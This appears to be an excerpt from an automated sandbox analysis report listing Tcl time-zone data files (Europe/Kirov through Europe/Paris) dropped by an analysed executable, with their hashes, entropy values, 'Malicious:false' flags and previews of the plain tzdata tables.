                                                                                                                                                                                                                              SHA1:7BC5ECDE9EFADE812AF40CB92CCE5323FB57C78D
                                                                                                                                                                                                                              SHA-256:60884D4B8B17A9AB8FB5697DA95F62E570755348109C661D783D56CD047BBE9E
                                                                                                                                                                                                                              SHA-512:2043FDBA860E8F6578F7E26A80C7787B82C7D15188327923EC36D153FDF9BEEAE063012ACE4309B76DB9DBA2DFFB7404DE370BA85023CCE93159FCAD3B9B92B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kirov) {.. {-9223372036854775808 11928 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {78044
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7455
                                                                                                                                                                                                                              Entropy (8bit):3.7624983280224953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vC1LyEpkv8V3MpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb4:vC9VW0bivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:F37C7529B53C4C158341AF90F80C3A11
                                                                                                                                                                                                                              SHA1:210650A882350D35C72A934749F276C58C572DFA
                                                                                                                                                                                                                              SHA-256:591264F69DB19DDCDC90E704525E2D3D3984117B710F482F19DA8F88628EE6A7
                                                                                                                                                                                                                              SHA-512:F23B0C5251EB7418A1C80344AB7623D2A0197E681E3B7D152E416187BF66DE09A7A60A65F8ED6A810272CF0C253D63684F08AF594A8C22ABEA89E3BBADC8F0A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kyiv) {.. {-9223372036854775808 7324 0 LMT}.. {-2840148124 7324 0 KMT}.. {-1441159324 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-892522800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-825382800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {638319600 14400 1 MSD}.. {646786800 10800 1 EEST}.. {686102400 7200 0 EET}.. {701827200 10800 1 EEST}.. {7175
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9878
                                                                                                                                                                                                                              Entropy (8bit):3.8275310275285723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:j76abXsyZLEjx82YbtIaFF1w0us4qE3+sSGjT:j77bXsyZLEjx82atysLE3+sSGjT
                                                                                                                                                                                                                              MD5:0DA331C2A815739E6758797BD24554EA
                                                                                                                                                                                                                              SHA1:3829C441E908BEFDC4ED6AB65FD4ACD0C97D5E1B
                                                                                                                                                                                                                              SHA-256:9FAC9812411F88014779D34722F3E0D2750E45BF21595DF1AE14CB9CCFD3F33F
                                                                                                                                                                                                                              SHA-512:FEBBA05F64AC1F3066AF6351493DD89768154FD171D447503DAEDB90D16858BEDBCE4A74E24AC0C37B5FF191692AF44AADDE4A92E752F88C48DA646352AD9A0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Lisbon) {.. {-9223372036854775808 -2205 0 LMT}.. {-2713908195 -2205 0 LMT}.. {-1830384000 0 0 WET}.. {-1689555600 3600 1 WEST}.. {-1677801600 0 0 WET}.. {-1667437200 3600 1 WEST}.. {-1647738000 0 0 WET}.. {-1635814800 3600 1 WEST}.. {-1616202000 0 0 WET}.. {-1604365200 3600 1 WEST}.. {-1584666000 0 0 WET}.. {-1572742800 3600 1 WEST}.. {-1553043600 0 0 WET}.. {-1541206800 3600 1 WEST}.. {-1521507600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1426813200 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1221440400 3600 1 WEST}.. {-1206925200 0 0 WET}.. {-1191200400 3600 1 WEST}.. {-1175475600 0 0 WET}.. {-1127696400 3600 1 WEST}.. {-1111971600 0 0 WET}.. {-1096851
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.948438246006353
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQavPSJ5Qahs0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNl
                                                                                                                                                                                                                              MD5:56C6C95484FEAF9BAF755683E7417B58
                                                                                                                                                                                                                              SHA1:A43176BEBC5B4D7144A7E1109E0AAEFD95C21EC6
                                                                                                                                                                                                                              SHA-256:713A842197516D618F2D86977262542A1CA334D7DF6026539FA2F2980DBF4CD3
                                                                                                                                                                                                                              SHA-512:566B6DF2D76A8A4D3405C4785C7A471A23D65CD8838831BD0DEDF5BF194E8A3B304CA9920CB4A8EC9D6CD60EAA9BE0335E38D9547A4D23C7E4E5E5A39A09DDAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10211
                                                                                                                                                                                                                              Entropy (8bit):3.826887992237191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:GNoCvTZtcf80KYiK3BG0Myj9TYQOeMAwbccM0Fp:GNNTZtcf15iOBG08eNwbccM0Fp
                                                                                                                                                                                                                              MD5:0625C99E16D3C956DED1C0C0F867DEC3
                                                                                                                                                                                                                              SHA1:6ACDF0DB619B63E21EC89046B9320A85FBD3397A
                                                                                                                                                                                                                              SHA-256:D04C4E25DF4DE1C1CFE1EF84B3B6DD746CF08A271AB0958F22C7D580A3ED10E6
                                                                                                                                                                                                                              SHA-512:07AC42F0635DF01CC0AFD13F9668B143D4943BA0E4C377D254B5AF034D9DDBAB77BA813187E9AB73D2EEAD86EBAA26DC15599FD74FC82EEF287F5A6AB9C01635
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/London) {.. {-9223372036854775808 -75 0 LMT}.. {-3852662325 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.920751023999728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQavQLHKQX9J8QahCv:SlSWB9vsM3ymhS2HAIgoh26N/y1QzKQt
                                                                                                                                                                                                                              MD5:E4A8C25756D6C5D2073A51D2B54E3A0C
                                                                                                                                                                                                                              SHA1:4A24667ADC9BD31E8CB298BE3787C12301C3F1C8
                                                                                                                                                                                                                              SHA-256:8C0486A5B235E8B01069420976E1B8D08D77A4BEF587203AF1B68D7B5333546E
                                                                                                                                                                                                                              SHA-512:F3593C3B75C9DA931FB39BC2054EB9691C3A544A74F871425169C3244040D6D060510741FE1E352A1E59F53E5A585307D434A0D7C9D159D065717E78C807787C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Luxembourg) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8517
                                                                                                                                                                                                                              Entropy (8bit):3.8326167134909177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:k5m01LdXKc0TJp+bwS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOn:+DaNVLSs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:63263380F57B756A1DFA3796E4188CD3
                                                                                                                                                                                                                              SHA1:8EEE707AC4FEA1C098C81AC2D289A46239121A5E
                                                                                                                                                                                                                              SHA-256:5337C9843C56DEEC6B91C4468C76EC1C896E80421B72B583B69DE5579063E09A
                                                                                                                                                                                                                              SHA-512:ACA4830020715C471741E27EB2292ACF002D2CD7EDCD1061978B64967EB447F61AA095F960D8A75A01B9B87558D83FF409F30BDACA83E063024F1E2381FA64C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Madrid) {.. {-9223372036854775808 -884 0 LMT}.. {-2177452800 0 0 WET}.. {-1631926800 3600 1 WEST}.. {-1616889600 0 0 WET}.. {-1601168400 3600 1 WEST}.. {-1585353600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269820800 0 0 WET}.. {-1026954000 3600 1 WEST}.. {-1017619200 0 0 WET}.. {-1001898000 3600 1 WEST}.. {-999482400 7200 1 WEMT}.. {-986090400 3600 1 WEST}.. {-954115200 0 0 WET}.. {-940208400 3600 0 CET}.. {-873079200 7200 1 CEST}.. {-862621200 3600 0 CET}.. {-842839200 7200 1 CEST}.. {-828320400 3600 0 CET}.. {-811389600 7200 1 CEST}.. {-796870800 3600 0 CET}.. {-779940000 7200 1 CEST}.. {-765421200 3600 0 CET}.. {-74849
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8724
                                                                                                                                                                                                                              Entropy (8bit):3.816380386871747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KAGvi2GmkwwnpH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZN:KLsww141sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:9B09D6EED8F23BAFFB62929C0115E852
                                                                                                                                                                                                                              SHA1:4AEF15333C73C2836C09D818FD0E20440D7C4780
                                                                                                                                                                                                                              SHA-256:C5C240BAAECE8235D1FBDD251C1A67CB2D2FC8195DD5BBE37FF9CFF0445FCDA2
                                                                                                                                                                                                                              SHA-512:43AA3492BD335A290C6EFEE275B47EA18E544199E37A9BBAE2E350D42BDFF42F0E9ED461A4BB1824CA33F84A90D4060906844A3E22DA49C9821E4CB460832D6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Malta) {.. {-9223372036854775808 3484 0 LMT}.. {-2403478684 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812588400 7200 1 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 3600 0 CET}.. {-81997200 7200 1 CEST}.. {-71715600 3600 0 CET}.. {-50547600 7200 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.959733196757503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV1AYKjG5XHAIgoq2AYKjo0ARL/yQausWILMFJ8QaC:SlSWB9vsM3ymrAdjGJHAIgorAdjo0ANn
                                                                                                                                                                                                                              MD5:C1844961691214F6E6DF6487788A7758
                                                                                                                                                                                                                              SHA1:6D08E9FB7B8602A80622148BFACD9676F45F0E2B
                                                                                                                                                                                                                              SHA-256:6136C3CFA4A767E7C9DDA23A283AD98B72E9868F192E6A8E3BFE6396F6989BD1
                                                                                                                                                                                                                              SHA-512:B2D1EA51AC5B34792AC02820A9D60FD41F3B91AB6505896476FCB0DC339B8DC1DE9E2C89A7627F69E16247661AE8040D789FFD2F8F1CD59F243B57C4845B450F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Helsinki)]} {.. LoadTimeZoneFile Europe/Helsinki..}..set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2177
                                                                                                                                                                                                                              Entropy (8bit):3.9354590900153172
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:K8cVnR7xhuHJkminzaVV04v3TfdGY3kNmneVuNlh000sGpde:5mnRtEpkmiSV3A8qcN
                                                                                                                                                                                                                              MD5:9C10EAE9FA0DE192C5FD4F76E12606F0
                                                                                                                                                                                                                              SHA1:AFD5650410EC3E6ED564A8B2ABF91709D090B4AD
                                                                                                                                                                                                                              SHA-256:8C95EA696EA578DEF726502AC181AF475A676030878F56B4E2D667757BBD1C49
                                                                                                                                                                                                                              SHA-512:3B9ED6B68858485B9A46A0863B7D9D3C1E4C5BBA269457F24A9A12C274F0F9B35E63D8C25EB53E7200DB57DD35ACCB7FD7D8AB005FEE2C4D7FC6E72E8CF57194
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Minsk) {.. {-9223372036854775808 6616 0 LMT}.. {-2840147416 6600 0 MMT}.. {-1441158600 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-899780400 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-804646800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {670374000 7200 0 EEMMTT}.. {670377600 10800 1 EEST}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.9089012087310095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtEXc4o3vXHAIgoquEXeRL/yQauPMFBx6QazEXcov:SlSWB9vsM3ymzESPHAIgozEON/ySRpEB
                                                                                                                                                                                                                              MD5:2015CF8BBEEE12AF0D9C82FD2E246C72
                                                                                                                                                                                                                              SHA1:062BFFBB266C3EBB5776A509DDB7A6044C82B864
                                                                                                                                                                                                                              SHA-256:9DF16BB1C26100635DC4CB1DF409B0FA7B139C22BF09574ED337EE244CA3C546
                                                                                                                                                                                                                              SHA-512:FD3479588D4F3B84CF6C8B8A5DB1AB3BFA0A87CA2FFADB4FEBBBB25711C77963BE7CD0D1DA5ED985D729F39C5B44E8CBD429F1E2DA813DF26272D66CAE4F425A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Paris)]} {.. LoadTimeZoneFile Europe/Paris..}..set TZData(:Europe/Monaco) $TZData(:Europe/Paris)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2430
                                                                                                                                                                                                                              Entropy (8bit):3.942836780611272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7fnjazk7e+LxhuHJkvVineTeCTU50x0Y7:7fnjazk7eoEpkvVieTeCTUax0Y7
                                                                                                                                                                                                                              MD5:4547D47E9364ACAFB2A4BEE52D04BFBB
                                                                                                                                                                                                                              SHA1:1E7F964692F81D49AEAF581FE70AD22D4E36226B
                                                                                                                                                                                                                              SHA-256:31F9C3C2F17B3EE4FA6D9EE6A86BF407AC0377DE4D666C65E86CE5AC591F829F
                                                                                                                                                                                                                              SHA-512:7F1D7C80A1BF611D5440EEF9085DA6CDED86B5EF4C2737C105640030E5AA998A0951182E72DC224190A25DA8846CDE856A78EBAA8876AA0B18B1CBCADBB060FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Moscow) {.. {-9223372036854775808 9017 0 LMT}.. {-2840149817 9017 0 MMT}.. {-1688265017 9079 0 MMT}.. {-1656819079 12679 1 MST}.. {-1641353479 9079 0 MMT}.. {-1627965079 16279 1 MDST}.. {-1618716679 12679 1 MST}.. {-1596429079 16279 1 MDST}.. {-1593820800 14400 0 MSD}.. {-1589860800 10800 0 MSK}.. {-1542427200 14400 1 MSD}.. {-1539493200 18000 1 +05}.. {-1525323600 14400 1 MSD}.. {-1491188400 7200 0 EET}.. {-1247536800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.7873368289068905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85GKLlXHAIgNwMGKLZRRL/yQatHefeWFKYGKL8n:SlSWB9vsM3yZdL1HAIgGMdLZRN/y3HeA
                                                                                                                                                                                                                              MD5:BE82205480617CF07F76BA0DF06C95BC
                                                                                                                                                                                                                              SHA1:46D2D8D9FE4FB570C2A09BC809B02C8960F9601F
                                                                                                                                                                                                                              SHA-256:FC93B7516933EDFDC211AC0822EE88BF7ACAD1C58A0643B15294F82EB0F14414
                                                                                                                                                                                                                              SHA-512:F490A70053A6011D80FB0A4E96D2871BFEEB168690E21C4EC31F2F5C0E24A67C706528C81322A1D48E71242F0FFA277550192925FDE5B1F34BFCB308290E11FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Nicosia)]} {.. LoadTimeZoneFile Asia/Nicosia..}..set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.910647918749938
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQasWJAQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yI7Fv
                                                                                                                                                                                                                              MD5:242748F361AD524CD8E288BEE8611E19
                                                                                                                                                                                                                              SHA1:A636A544BB54851185E2BE83DAC69C813B824827
                                                                                                                                                                                                                              SHA-256:C84E9C0D22059573079211CBF487072CAB95C14B5ECEFB596CF1F594ABD3458C
                                                                                                                                                                                                                              SHA-512:404B272D0C6B70332052601EA65C0F7AE71C12F62D19FD3010BBA6FB25E4F2F95BB9E5F295D8494CBADB1AE9C7F833C42382AE7488317EA6F0C20E60B63BEFE8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Oslo) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9152
                                                                                                                                                                                                                              Entropy (8bit):3.8506895725632746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fySTO1C+4qoMYOKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdi:fdp+3Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:9CAF8C5C5AF630E7F782C0480DD786E7
                                                                                                                                                                                                                              SHA1:9FBEF9EEDD8BAFB48B17E3AC388CFEF8DCD10CB0
                                                                                                                                                                                                                              SHA-256:AE61491C4A587F56426A9F2118E31060276F2B0231E750C461781577551CA196
                                                                                                                                                                                                                              SHA-512:F809744BB597184A2815758A27B6A07C515C65DB96CFFB3625FD059DEBBF05EE903E999483B3459C7C8D3991824746F8530CD1378F8A63B1F54F60CFACE9F89B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Paris) {.. {-9223372036854775808 561 0 LMT}.. {-2486592561 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1470618000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1253494800 3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.910162937111088
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQazKIGl1/yQ0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNK
